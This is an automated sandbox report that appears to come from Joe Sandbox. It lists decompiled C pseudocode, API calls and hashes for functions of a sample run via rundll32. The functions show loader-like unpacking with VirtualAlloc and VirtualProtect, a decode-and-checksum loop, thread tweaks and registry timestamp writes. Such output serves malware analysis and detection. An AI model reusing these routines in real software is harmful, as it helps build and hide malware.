                                      • API ID: Time$FileSleepSwitchSystemThread_aullremmemcpy
                                      • String ID:
                                      • API String ID: 1610602887-0
                                      • Opcode ID: 75a19181fac8af9ca951b727c484025b4deeba92dc605432c60880c05e7b9069
                                      • Instruction ID: 53ba1123336b9a60436da9817cbcb889c73cb4dd396549d2e2b17e8a33fe1b3a
                                      • Opcode Fuzzy Hash: 75a19181fac8af9ca951b727c484025b4deeba92dc605432c60880c05e7b9069
                                      • Instruction Fuzzy Hash: DCF0A4B7A002087BEB149BA5DC1DFDF77BDDB84355F000129F601E7240E678AA0086A0
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      C-Code - Quality: 87%
                                      			E00401B7F(void* __ecx, char _a4) {
                                      				long _t3;
                                      				int _t4;
                                      				int _t9;
                                      				void* _t13;
                                      
                                      				_t13 = GetCurrentThread();
                                      				_t3 = SetThreadAffinityMask(_t13, 1); // executed
                                      				if(_t3 != 0) {
                                      					SetThreadPriority(_t13, 0xffffffff); // executed
                                      				}
                                      				_t4 = E00401308(_a4); // executed
                                      				_t9 = _t4;
                                      				if(_t9 == 0) {
                                      					SetThreadPriority(_t13, _t4);
                                      				}
                                      				asm("lock xadd [eax], ecx");
                                      				return _t9;
                                      			}








                                      APIs
                                      • GetCurrentThread.KERNEL32 ref: 00401B82
                                      • SetThreadAffinityMask.KERNEL32(00000000,00000001), ref: 00401B8D
                                      • SetThreadPriority.KERNEL32(00000000,000000FF), ref: 00401BA0
                                      • SetThreadPriority.KERNEL32(00000000,00000000,?), ref: 00401BB3
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.950458300.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000003.00000002.950449846.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000003.00000002.950465136.0000000000403000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000003.00000002.950497345.0000000000405000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000003.00000002.950532385.0000000000406000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_400000_rundll32.jbxd
                                      Similarity
                                      • API ID: Thread$Priority$AffinityCurrentMask
                                      • String ID:
                                      • API String ID: 1452675757-0
                                      • Opcode ID: 5ec2324a3aece868636b7716a0e00cb7fbbf2160a91f8f79ca2eaebe1d539e4a
                                      • Instruction ID: 530bc985a7ac1ad85ace009cb5ebf350f6c4e318540664810b7604832fdd1336
                                      • Opcode Fuzzy Hash: 5ec2324a3aece868636b7716a0e00cb7fbbf2160a91f8f79ca2eaebe1d539e4a
                                      • Instruction Fuzzy Hash: 99E09B313062112BD7122F2A5C84D6F7A6CDF923317010336F510B22F0DB788D01856D
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      C-Code - Quality: 50%
                                      			E044B765B(void** __esi) {
                                      				intOrPtr _v0;
                                      				intOrPtr _t4;
                                      				intOrPtr _t6;
                                      				void* _t8;
                                      				void* _t9;
                                      				intOrPtr _t10;
                                      				void* _t11;
                                      				void** _t13;
                                      
                                      				_t13 = __esi;
                                      				_t4 =  *0x44ba3cc; // 0x4e695b0
                                      				__imp__(_t4 + 0x40);
                                      				while(1) {
                                      					_t6 =  *0x44ba3cc; // 0x4e695b0
                                      					_t1 = _t6 + 0x58; // 0x0
                                      					if( *_t1 == 0) {
                                      						break;
                                      					}
                                      					Sleep(0xa);
                                      				}
                                      				_t8 =  *_t13;
                                      				if(_t8 != 0 && _t8 != 0x44ba030) {
                                      					HeapFree( *0x44ba2d8, 0, _t8);
                                      				}
                                      				_t9 = E044B6E6D(_v0, _t13); // executed
                                      				_t13[1] = _t9;
                                      				_t10 =  *0x44ba3cc; // 0x4e695b0
                                      				_t11 = _t10 + 0x40;
                                      				__imp__(_t11);
                                      				return _t11;
                                      			}












                                      APIs
                                      • RtlEnterCriticalSection.NTDLL(04E69570), ref: 044B7664
                                      • Sleep.KERNEL32(0000000A), ref: 044B766E
                                      • HeapFree.KERNEL32(00000000,00000000), ref: 044B7696
                                      • RtlLeaveCriticalSection.NTDLL(04E69570), ref: 044B76B2
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.951691155.00000000044B1000.00000020.10000000.00040000.00000000.sdmp, Offset: 044B0000, based on PE: true
                                      • Associated: 00000003.00000002.951646149.00000000044B0000.00000004.10000000.00040000.00000000.sdmp
                                      • Associated: 00000003.00000002.951796245.00000000044B9000.00000002.10000000.00040000.00000000.sdmp
                                      • Associated: 00000003.00000002.951843562.00000000044BA000.00000004.10000000.00040000.00000000.sdmp
                                      • Associated: 00000003.00000002.951894977.00000000044BC000.00000002.10000000.00040000.00000000.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_44b0000_rundll32.jbxd
                                      Similarity
                                      • API ID: CriticalSection$EnterFreeHeapLeaveSleep
                                      • String ID:
                                      • API String ID: 58946197-0
                                      • Opcode ID: cfc6d3f472a3e9dfa419bab80db00c8d589ae9a5783aaec942b2687147af2df8
                                      • Instruction ID: fd58ca1aa2d2730086afd1ba90ba55f86d2cf56f935ead559156fe0017f1fcf6
                                      • Opcode Fuzzy Hash: cfc6d3f472a3e9dfa419bab80db00c8d589ae9a5783aaec942b2687147af2df8
                                      • Instruction Fuzzy Hash: 21F012B02007419BFB24AF69DC48F567BE4EF54744F045405F685E6292D738FC50DBA5
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      C-Code - Quality: 86%
                                      			E0040197C(void* __edi, intOrPtr _a4) {
                                      				signed int _v8;
                                      				intOrPtr _v12;
                                      				unsigned int _v16;
                                      				intOrPtr _v20;
                                      				char _v24;
                                      				void* _v28;
                                      				intOrPtr _v32;
                                      				intOrPtr _v36;
                                      				intOrPtr _v40;
                                      				intOrPtr _v48;
                                      				intOrPtr _v52;
                                      				intOrPtr _t46;
                                      				void* _t53;
                                      				intOrPtr _t54;
                                      				intOrPtr _t58;
                                      				signed int _t67;
                                      				intOrPtr _t69;
                                      				intOrPtr _t85;
                                      				intOrPtr _t86;
                                      
                                      				_t85 =  *0x4041b0;
                                      				_t46 = E00401922(_t85,  &_v24,  &_v16);
                                      				_v20 = _t46;
                                      				if(_t46 == 0) {
                                      					asm("sbb ebx, ebx");
                                      					_t67 =  ~( ~(_v16 & 0x00000fff)) + (_v16 >> 0xc);
                                      					_t86 = _t85 + _v24;
                                      					_v40 = _t86;
                                      					_t53 = VirtualAlloc(0, _t67 << 0xc, 0x3000, 4); // executed
                                      					_v28 = _t53;
                                      					if(_t53 == 0) {
                                      						_v20 = 8;
                                      					} else {
                                      						_v8 = _v8 & 0x00000000;
                                      						if(_t67 <= 0) {
                                      							_t54 =  *0x4041c0;
                                      						} else {
                                      							_t69 = _a4;
                                      							_t58 = _t53 - _t86;
                                      							_t13 = _t69 + 0x4051a7; // 0x4051a7
                                      							_v32 = _t58;
                                      							_v36 = _t58 + _t13;
                                      							_v12 = _t86;
                                      							while(1) {
                                      								asm("movsd");
                                      								asm("movsd");
                                      								asm("movsd");
                                      								E00401FD8(_v12 + _t58, _v12, _v52 - _v8 + _v48 + _v24 + _a4 - 1, 0x400);
                                      								_v12 = _v12 + 0x1000;
                                      								_t54 =  *((intOrPtr*)(_v36 + 0xc)) -  *((intOrPtr*)(_v36 + 8)) +  *((intOrPtr*)(_v36 + 4));
                                      								_v8 = _v8 + 1;
                                      								 *0x4041c0 = _t54;
                                      								if(_v8 >= _t67) {
                                      									break;
                                      								}
                                      								_t58 = _v32;
                                      							}
                                      						}
                                      						if(_t54 != 0x69b25f44) {
                                      							_v20 = 9;
                                      						} else {
                                      							E0040212B(_v16, _v28, _v40);
                                      						}
                                      						VirtualFree(_v28, 0, 0x8000); // executed
                                      					}
                                      				}
                                      				return _v20;
                                      			}























                                      APIs
                                      • VirtualAlloc.KERNEL32(00000000,76D863F0,00003000,00000004,00000030,00000000,76D863F0,00000000,?,?,?,?,?,?,0040137D,00000000), ref: 004019D2
                                      • VirtualFree.KERNELBASE(0040137D,00000000,00008000,?,?,?,?,?,?,0040137D,00000000), ref: 00401A85
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.950458300.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000003.00000002.950449846.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000003.00000002.950465136.0000000000403000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000003.00000002.950497345.0000000000405000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000003.00000002.950532385.0000000000406000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_400000_rundll32.jbxd
                                      Similarity
                                      • API ID: Virtual$AllocFree
                                      • String ID: Apr 26 2022
                                      • API String ID: 2087232378-3671839962
                                      • Opcode ID: ae9bb6daa5ee41dbb0380df7045b319595a36fdee4abdb97101aff6bf739f21c
                                      • Instruction ID: ba9eff79541a9afd743da593f02ff0d2c34f0f393f471016fce9fbd4e5145794
                                      • Opcode Fuzzy Hash: ae9bb6daa5ee41dbb0380df7045b319595a36fdee4abdb97101aff6bf739f21c
                                      • Instruction Fuzzy Hash: C9313075E01219DFDB01DF94D980BAEB7B4FF04304F104169E915BB290D775AA46CF98
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      C-Code - Quality: 100%
                                      			E044B216C(void* __edx) {
                                      				void* _v8;
                                      				int _v12;
                                      				WCHAR* _v16;
                                      				void* __edi;
                                      				void* __esi;
                                      				void* _t23;
                                      				intOrPtr _t24;
                                      				void* _t26;
                                      				intOrPtr _t32;
                                      				intOrPtr _t35;
                                      				void* _t37;
                                      				intOrPtr _t38;
                                      				intOrPtr _t42;
                                      				void* _t45;
                                      				void* _t50;
                                      				void* _t52;
                                      
                                      				_t50 = __edx;
                                      				_v12 = 0;
                                      				_t23 = E044B3695(0,  &_v8); // executed
                                      				if(_t23 != 0) {
                                      					_v8 = 0;
                                      				}
                                      				_t24 =  *0x44ba348; // 0x9ad5a8
                                      				_t4 = _t24 + 0x44bbe58; // 0x4e69400
                                      				_t5 = _t24 + 0x44bbe00; // 0x4f0053
                                      				_t26 = E044B155C( &_v16, _v8, _t5, _t4); // executed
                                      				_t45 = _t26;
                                      				if(_t45 == 0) {
                                      					StrToIntExW(_v16, 0,  &_v12);
                                      					_t45 = 8;
                                      					if(_v12 < _t45) {
                                      						_t45 = 1;
                                      						__eflags = 1;
                                      					} else {
                                      						_t32 =  *0x44ba348; // 0x9ad5a8
                                      						_t11 = _t32 + 0x44bbe4c; // 0x4e693f4
                                      						_t48 = _t11;
                                      						_t12 = _t32 + 0x44bbe00; // 0x4f0053
                                      						_t52 = E044B28C4(_t11, _t12, _t11);
                                      						_t59 = _t52;
                                      						if(_t52 != 0) {
                                      							_t35 =  *0x44ba348; // 0x9ad5a8
                                      							_t13 = _t35 + 0x44bba51; // 0x30314549
                                      							_t37 = E044B41FA(_t48, _t50, _t59, _v8, _t52, _t13, 0x14); // executed
                                      							if(_t37 == 0) {
                                      								_t61 =  *0x44ba2fc - 6;
                                      								if( *0x44ba2fc <= 6) {
                                      									_t42 =  *0x44ba348; // 0x9ad5a8
                                      									_t15 = _t42 + 0x44bbde2; // 0x52384549
                                      									E044B41FA(_t48, _t50, _t61, _v8, _t52, _t15, 0x13);
                                      								}
                                      							}
                                      							_t38 =  *0x44ba348; // 0x9ad5a8
                                      							_t17 = _t38 + 0x44bbe90; // 0x4e69438
                                      							_t18 = _t38 + 0x44bbe68; // 0x680043
                                      							_t45 = E044B74B6(_v8, 0x80000001, _t52, _t18, _t17);
                                      							HeapFree( *0x44ba2d8, 0, _t52);
                                      						}
                                      					}
                                      					HeapFree( *0x44ba2d8, 0, _v16);
                                      				}
                                      				_t54 = _v8;
                                      				if(_v8 != 0) {
                                      					E044B3AC2(_t54);
                                      				}
                                      				return _t45;
                                      			}




















                                      APIs
                                      • StrToIntExW.SHLWAPI(?,00000000,?,?,004F0053,04E69400,00000000,?,76DDF710,00000000,76DDF730), ref: 044B21BB
                                      • HeapFree.KERNEL32(00000000,00000000,?,80000001,00000000,00680043,04E69438,?,00000000,30314549,00000014,004F0053,04E693F4), ref: 044B2258
                                      • HeapFree.KERNEL32(00000000,?,?,?,?,?,?,?,044B66BE), ref: 044B226A
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.951691155.00000000044B1000.00000020.10000000.00040000.00000000.sdmp, Offset: 044B0000, based on PE: true
                                      • Associated: 00000003.00000002.951646149.00000000044B0000.00000004.10000000.00040000.00000000.sdmp
                                      • Associated: 00000003.00000002.951796245.00000000044B9000.00000002.10000000.00040000.00000000.sdmp
                                      • Associated: 00000003.00000002.951843562.00000000044BA000.00000004.10000000.00040000.00000000.sdmp
                                      • Associated: 00000003.00000002.951894977.00000000044BC000.00000002.10000000.00040000.00000000.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_44b0000_rundll32.jbxd
                                      Similarity
                                      • API ID: FreeHeap
                                      • String ID:
                                      • API String ID: 3298025750-0
                                      • Opcode ID: e7ff856d40bd9203d787d7669453f1d39abdc1f6350799a69ff9bf7f023df0e6
                                      • Instruction ID: 90491be85f28195a46329ec1dc1548b4076a6094374dc603280d3962bf4f0e93
                                      • Opcode Fuzzy Hash: e7ff856d40bd9203d787d7669453f1d39abdc1f6350799a69ff9bf7f023df0e6
                                      • Instruction Fuzzy Hash: B931B731900218BFEF11DBD5DC48EDE77BCEB44704F1441A6A641AB261D6B1BE54DBE0
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      C-Code - Quality: 87%
                                      			E00401A9D(void* __eax, void* _a4) {
                                      				signed int _v8;
                                      				signed int _v12;
                                      				signed int _v16;
                                      				long _v20;
                                      				int _t43;
                                      				long _t54;
                                      				signed int _t57;
                                      				void* _t58;
                                      				signed int _t60;
                                      
                                      				_v12 = _v12 & 0x00000000;
                                      				_t57 =  *0x4041c0;
                                      				_t58 = ( *(__eax + 0x14) & 0x0000ffff) + __eax + 0x18;
                                      				_v16 =  *(__eax + 6) & 0x0000ffff;
                                      				VirtualProtect(_a4,  *(__eax + 0x54), _t57 - 0x69b25f40,  &_v20); // executed
                                      				_v8 = _v8 & 0x00000000;
                                      				if(_v16 <= 0) {
                                      					L12:
                                      					return _v12;
                                      				} else {
                                      					goto L1;
                                      				}
                                      				while(1) {
                                      					L1:
                                      					_t60 = _v12;
                                      					if(_t60 != 0) {
                                      						goto L12;
                                      					}
                                      					asm("bt [esi+0x24], eax");
                                      					if(_t60 >= 0) {
                                      						asm("bt [esi+0x24], eax");
                                      						if(__eflags >= 0) {
                                      							L8:
                                      							_t54 = _t57 - 0x69b25f40;
                                      							L9:
                                      							_t43 = VirtualProtect( *((intOrPtr*)(_t58 + 0xc)) + _a4,  *(_t58 + 8), _t54,  &_v20); // executed
                                      							if(_t43 == 0) {
                                      								_v12 = GetLastError();
                                      							}
                                      							_v8 = _v8 + 1;
                                      							_t58 = _t58 + 0x7c211d88 + _t57 * 0x28;
                                      							if(_v8 < _v16) {
                                      								continue;
                                      							} else {
                                      								goto L12;
                                      							}
                                      						}
                                      						asm("bt [esi+0x24], eax");
                                      						_t54 = _t57 - 0x69b25f42;
                                      						if(__eflags >= 0) {
                                      							goto L9;
                                      						}
                                      						goto L8;
                                      					}
                                      					asm("bt [esi+0x24], eax");
                                      					if(_t60 >= 0) {
                                      						_t54 = _t57 - 0x69b25f24;
                                      					} else {
                                      						_t54 = _t57 - 0x69b25f04;
                                      					}
                                      					goto L9;
                                      				}
                                      				goto L12;
                                      			}













                                      APIs
                                      • VirtualProtect.KERNEL32(00000000,?,?,?,?,?,00000000,?), ref: 00401AD6
                                      • VirtualProtect.KERNEL32(00000000,?,?,?), ref: 00401B4B
                                      • GetLastError.KERNEL32 ref: 00401B51
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.950458300.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000003.00000002.950449846.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000003.00000002.950465136.0000000000403000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000003.00000002.950497345.0000000000405000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000003.00000002.950532385.0000000000406000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_400000_rundll32.jbxd
                                      Similarity
                                      • API ID: ProtectVirtual$ErrorLast
                                      • String ID:
                                      • API String ID: 1469625949-0
                                      • Opcode ID: 6ced9a72dc2c1945128a502a870018d78ab80d3f499d1687ade8e6ef3ea2f637
                                      • Instruction ID: 25fad19d6578cafab31add35f05609419888c05dd3aa09afcfe302362acdf30b
                                      • Opcode Fuzzy Hash: 6ced9a72dc2c1945128a502a870018d78ab80d3f499d1687ade8e6ef3ea2f637
                                      • Instruction Fuzzy Hash: 9821607190020AEFCB14DF85C985ABAF7F4FF58345F0144AAD106E7158E3B8BA64CB98
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      C-Code - Quality: 47%
                                      			E044B6E6D(char* _a4, char** _a8) {
                                      				char* _t7;
                                      				char* _t11;
                                      				char* _t14;
                                      				char* _t16;
                                      				char* _t17;
                                      				char _t18;
                                      				signed int _t20;
                                      				signed int _t22;
                                      
                                      				_t16 = _a4;
                                      				_push(0x20);
                                      				_t20 = 1;
                                      				_push(_t16);
                                      				while(1) {
                                      					_t7 = StrChrA();
                                      					if(_t7 == 0) {
                                      						break;
                                      					}
                                      					_t20 = _t20 + 1;
                                      					_push(0x20);
                                      					_push( &(_t7[1]));
                                      				}
                                      				_t11 = E044B6D63(_t20 << 2);
                                      				_a4 = _t11;
                                      				if(_t11 != 0) {
                                      					StrTrimA(_t16, 0x44b9284); // executed
                                      					_t22 = 0;
                                      					do {
                                      						_t14 = StrChrA(_t16, 0x20);
                                      						if(_t14 != 0) {
                                      							 *_t14 = 0;
                                      							do {
                                      								_t14 =  &(_t14[1]);
                                      								_t18 =  *_t14;
                                      							} while (_t18 == 0x20 || _t18 == 9);
                                      						}
                                      						_t17 = _a4;
                                      						 *(_t17 + _t22 * 4) = _t16;
                                      						_t22 = _t22 + 1;
                                      						_t16 = _t14;
                                      					} while (_t14 != 0);
                                      					 *_a8 = _t17;
                                      				}
                                      				return 0;
                                      			}












                                      APIs
                                      • StrChrA.SHLWAPI(?,00000020,00000000,04E695AC,?,?,044B76A6,?,04E695AC), ref: 044B6E89
                                      • StrTrimA.SHLWAPI(?,044B9284,00000002,?,044B76A6,?,04E695AC), ref: 044B6EA7
                                      • StrChrA.SHLWAPI(?,00000020,?,044B76A6,?,04E695AC), ref: 044B6EB2
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.951691155.00000000044B1000.00000020.10000000.00040000.00000000.sdmp, Offset: 044B0000, based on PE: true
                                      • Associated: 00000003.00000002.951646149.00000000044B0000.00000004.10000000.00040000.00000000.sdmp
                                      • Associated: 00000003.00000002.951796245.00000000044B9000.00000002.10000000.00040000.00000000.sdmp
                                      • Associated: 00000003.00000002.951843562.00000000044BA000.00000004.10000000.00040000.00000000.sdmp
                                      • Associated: 00000003.00000002.951894977.00000000044BC000.00000002.10000000.00040000.00000000.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_44b0000_rundll32.jbxd
                                      Similarity
                                      • API ID: Trim
                                      • String ID:
                                      • API String ID: 3043112668-0
                                      • Opcode ID: 4cd0a69c0b3568a3975fa63f02bdb4733f461b306484c73ebe615f9ee5bf9adf
                                      • Instruction ID: 63f2257cbcc4f23f069bb8082828687ea31939e0efb78472357b667d51e4a606
                                      • Opcode Fuzzy Hash: 4cd0a69c0b3568a3975fa63f02bdb4733f461b306484c73ebe615f9ee5bf9adf
                                      • Instruction Fuzzy Hash: E3019E613003556FFF204A2ACC88BAB7A9DEB85741F060012AA85CB342DA70E802C7F1
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      C-Code - Quality: 75%
                                      			E044B46CB(void* __ecx, void* _a4, intOrPtr _a8, char _a12, intOrPtr _a16, char _a20, intOrPtr _a24, intOrPtr* _a28) {
                                      				void* _v8;
                                      				void* __esi;
                                      				intOrPtr* _t35;
                                      				void* _t40;
                                      				intOrPtr* _t41;
                                      				intOrPtr* _t43;
                                      				intOrPtr* _t45;
                                      				intOrPtr* _t50;
                                      				intOrPtr* _t52;
                                      				void* _t54;
                                      				intOrPtr* _t55;
                                      				intOrPtr* _t57;
                                      				intOrPtr* _t61;
                                      				intOrPtr* _t65;
                                      				intOrPtr _t68;
                                      				void* _t72;
                                      				void* _t75;
                                      				void* _t76;
                                      
                                      				_t55 = _a4;
                                      				_t35 =  *((intOrPtr*)(_t55 + 4));
                                      				_a4 = 0;
                                      				_t76 =  *((intOrPtr*)( *_t35 + 0x4c))(_t35, _a16, 0,  &_v8, 0, _t72, _t75, _t54, __ecx, __ecx);
                                      				if(_t76 < 0) {
                                      					L18:
                                      					return _t76;
                                      				}
                                      				_t40 = E044B74FE(_v8, _a8, _a12, _a20,  &_a20,  &_a12); // executed
                                      				_t76 = _t40;
                                      				if(_t76 >= 0) {
                                      					_t61 = _a28;
                                      					if(_t61 != 0 &&  *_t61 != 0) {
                                      						_t52 = _v8;
                                      						_t76 =  *((intOrPtr*)( *_t52 + 0x14))(_t52, _a24, 0, _t61, 0);
                                      					}
                                      					if(_t76 >= 0) {
                                      						_t43 =  *_t55;
                                      						_t68 =  *0x44ba348; // 0x9ad5a8
                                      						_t20 = _t68 + 0x44bb1fc; // 0x740053
                                      						_t76 =  *((intOrPtr*)( *_t43 + 0x60))(_t43, _t20, _a16, 0, 0, _v8,  &_a4, 0);
                                      						if(_t76 >= 0) {
                                      							_t76 = E044B65D1(_a4);
                                      							if(_t76 >= 0) {
                                      								_t65 = _a28;
                                      								if(_t65 != 0 &&  *_t65 == 0) {
                                      									_t50 = _a4;
                                      									_t76 =  *((intOrPtr*)( *_t50 + 0x10))(_t50, _a24, 0, _t65, 0, 0);
                                      								}
                                      							}
                                      						}
                                      						_t45 = _a4;
                                      						if(_t45 != 0) {
                                      							 *((intOrPtr*)( *_t45 + 8))(_t45);
                                      						}
                                      						_t57 = __imp__#6;
                                      						if(_a20 != 0) {
                                      							 *_t57(_a20);
                                      						}
                                      						if(_a12 != 0) {
                                      							 *_t57(_a12);
                                      						}
                                      					}
                                      				}
                                      				_t41 = _v8;
                                      				 *((intOrPtr*)( *_t41 + 8))(_t41);
                                      				goto L18;
                                      			}






















                                      APIs
                                        • Part of subcall function 044B74FE: SysAllocString.OLEAUT32(80000002), ref: 044B755B
                                        • Part of subcall function 044B74FE: SysFreeString.OLEAUT32(00000000), ref: 044B75C1
                                      • SysFreeString.OLEAUT32(?), ref: 044B47AA
                                      • SysFreeString.OLEAUT32(044B3520), ref: 044B47B4
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.951691155.00000000044B1000.00000020.10000000.00040000.00000000.sdmp, Offset: 044B0000, based on PE: true
                                      • Associated: 00000003.00000002.951646149.00000000044B0000.00000004.10000000.00040000.00000000.sdmp
                                      • Associated: 00000003.00000002.951796245.00000000044B9000.00000002.10000000.00040000.00000000.sdmp
                                      • Associated: 00000003.00000002.951843562.00000000044BA000.00000004.10000000.00040000.00000000.sdmp
                                      • Associated: 00000003.00000002.951894977.00000000044BC000.00000002.10000000.00040000.00000000.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_44b0000_rundll32.jbxd
                                      Similarity
                                      • API ID: String$Free$Alloc
                                      • String ID:
                                      • API String ID: 986138563-0
                                      • Opcode ID: 78d14a397ec693fab1f758ba30a005a4dab2f656ca6f209ccf2b0cb46c87ebd2
                                      • Instruction ID: 6865dd3ca3bb11f1f0bd9169605f0c1835188465023aa8fbce724aca4ecb00ed
                                      • Opcode Fuzzy Hash: 78d14a397ec693fab1f758ba30a005a4dab2f656ca6f209ccf2b0cb46c87ebd2
                                      • Instruction Fuzzy Hash: A7316975500118AFCF21DFA9C888CDBBBBAEBCA7507204659FD459B211D631ED51CBE0
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      C-Code - Quality: 100%
                                      			E00401BC9() {
                                      				char _v16;
                                      				intOrPtr _v28;
                                      				void _v32;
                                      				void* _v36;
                                      				intOrPtr _t15;
                                      				void* _t16;
                                      				long _t25;
                                      				int _t26;
                                      				void* _t30;
                                      				intOrPtr* _t32;
                                      				signed int _t36;
                                      				intOrPtr _t39;
                                      
                                      				_t15 =  *0x4041c4;
                                      				if( *0x4041ac > 5) {
                                      					_t16 = _t15 + 0x4050f9;
                                      				} else {
                                      					_t16 = _t15 + 0x4050b1;
                                      				}
                                      				E00401FB2(_t16, _t16);
                                      				_t36 = 6;
                                      				memset( &_v32, 0, _t36 << 2);
                                      				if(E004011DE( &_v32,  &_v16,  *0x4041c0 ^ 0xf7a71548) == 0) {
                                      					_t25 = 0xb;
                                      				} else {
                                      					_t26 = lstrlenW( *0x4041b8);
                                      					_t8 = _t26 + 2; // 0x2
                                      					_t11 = _t26 + _t8 + 8; // 0xa
                                      					_t30 = E00401C83(_t39, _t11,  &_v32,  &_v36); // executed
                                      					if(_t30 == 0) {
                                      						_t40 =  *0x4041b8;
                                      						_t32 = _v36;
                                      						 *_t32 = 0;
                                      						if( *0x4041b8 == 0) {
                                      							 *((short*)(_t32 + 4)) = 0;
                                      						} else {
                                      							E0040212B(_t45, _t40, _t32 + 4);
                                      						}
                                      					}
                                      					_t25 = E0040153F(_v28); // executed
                                      				}
                                      				ExitThread(_t25);
                                      			}

                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.950458300.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000003.00000002.950449846.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000003.00000002.950465136.0000000000403000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000003.00000002.950497345.0000000000405000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000003.00000002.950532385.0000000000406000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_400000_rundll32.jbxd
                                      Similarity
                                      • API ID: ExitThreadlstrlen
                                      • String ID:
                                      • API String ID: 2636182767-0
                                      • Opcode ID: f959fd5dec86d1ed9483960a9e1aa422b5814ea58d54d49f0de2b415be9ff4e9
                                      • Instruction ID: 6a6c7c8e180c95c4525c5684b83ff4d66f4962c4d19e8c41fd270bbd4965c872
                                      • Opcode Fuzzy Hash: f959fd5dec86d1ed9483960a9e1aa422b5814ea58d54d49f0de2b415be9ff4e9
                                      • Instruction Fuzzy Hash: CE11E2715082019BE711EB65DD8CE9B77ECAB44704F04493BB601FB2F1EB34E9458B5A
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      C-Code - Quality: 100%
                                      			E044B41FA(void* __ecx, void* __edx, void* __eflags, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, signed int _a16) {
                                      				struct _FILETIME _v12;
                                      				signed int _t11;
                                      				void* _t16;
                                      				short _t19;
                                      				void* _t22;
                                      				void* _t24;
                                      				void* _t25;
                                      				short* _t26;
                                      
                                      				_t24 = __edx;
                                      				_t25 = E044B61FC(_t11, _a12);
                                      				if(_t25 == 0) {
                                      					_t22 = 8;
                                      				} else {
                                      					_t26 = _t25 + _a16 * 2;
                                      					 *_t26 = 0; // executed
                                      					_t16 = E044B2AE4(__ecx, _a4, _a8, _t25); // executed
                                      					_t22 = _t16;
                                      					if(_t22 == 0) {
                                      						GetSystemTimeAsFileTime( &_v12);
                                      						_t19 = 0x5f;
                                      						 *_t26 = _t19;
                                      						_t22 = E044B4822(_t24, _a4, 0x80000001, _a8, _t25,  &_v12, 8);
                                      					}
                                      					HeapFree( *0x44ba2d8, 0, _t25);
                                      				}
                                      				return _t22;
                                      			}

                                      APIs
                                        • Part of subcall function 044B61FC: lstrlen.KERNEL32(?,00000000,04E69D70,00000000,044B39E8,04E69F93,69B25F44,?,?,?,?,69B25F44,00000005,044BA00C,4D283A53,?), ref: 044B6203
                                        • Part of subcall function 044B61FC: mbstowcs.NTDLL ref: 044B622C
                                        • Part of subcall function 044B61FC: memset.NTDLL ref: 044B623E
                                      • GetSystemTimeAsFileTime.KERNEL32(004F0053,004F0053,00000014,00000000,00000008,00000000,76D85520,00000008,00000014,004F0053,04E693F4), ref: 044B4232
                                      • HeapFree.KERNEL32(00000000,00000000,004F0053,00000014,00000000,00000008,00000000,76D85520,00000008,00000014,004F0053,04E693F4), ref: 044B4260
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.951691155.00000000044B1000.00000020.10000000.00040000.00000000.sdmp, Offset: 044B0000, based on PE: true
                                      • Associated: 00000003.00000002.951646149.00000000044B0000.00000004.10000000.00040000.00000000.sdmp
                                      • Associated: 00000003.00000002.951796245.00000000044B9000.00000002.10000000.00040000.00000000.sdmp
                                      • Associated: 00000003.00000002.951843562.00000000044BA000.00000004.10000000.00040000.00000000.sdmp
                                      • Associated: 00000003.00000002.951894977.00000000044BC000.00000002.10000000.00040000.00000000.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_44b0000_rundll32.jbxd
                                      Similarity
                                      • API ID: Time$FileFreeHeapSystemlstrlenmbstowcsmemset
                                      • String ID:
                                      • API String ID: 1500278894-0
